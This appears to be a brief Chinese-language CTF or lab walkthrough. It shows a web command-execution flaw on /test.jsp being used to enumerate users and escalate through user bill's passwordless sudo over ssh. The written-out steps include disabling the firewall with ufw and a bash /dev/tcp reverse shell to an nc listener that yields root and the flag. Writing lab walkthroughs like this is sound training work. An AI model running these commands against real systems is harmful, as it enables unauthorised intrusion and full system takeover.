主机地址:192.168.136.133
目标地址:192.168.136.135
先用nmap搜查:
然后用nitko工具查找网站的信息,看到有敏感文件泄露:
登陆网站并访问/test.jsp,看到界面有提醒用“ls -l /tmp”查看文件
当输入命令后,得到响应则可以认定为命令执行漏洞
查看home目录,挖掘用户信息 ls -alh /home/
查看具体用户的目录: ls -alh /home/用户名/,发现用户有ssh服务
查看系统消息:uname -a
查看bill用户 sudo命令的权限: ssh bill@localhost sudo -l
关闭防火墙: ssh bill@localhost sudo ufw disable
nc监听4444端口
输入ssh的命令注入,ssh bill@localhost sudo bash -i >& /dev/tcp/地址/4444 0>&1
反弹shell
监听成功并返回答复,此时是shell
查看root的文件目录,得到flag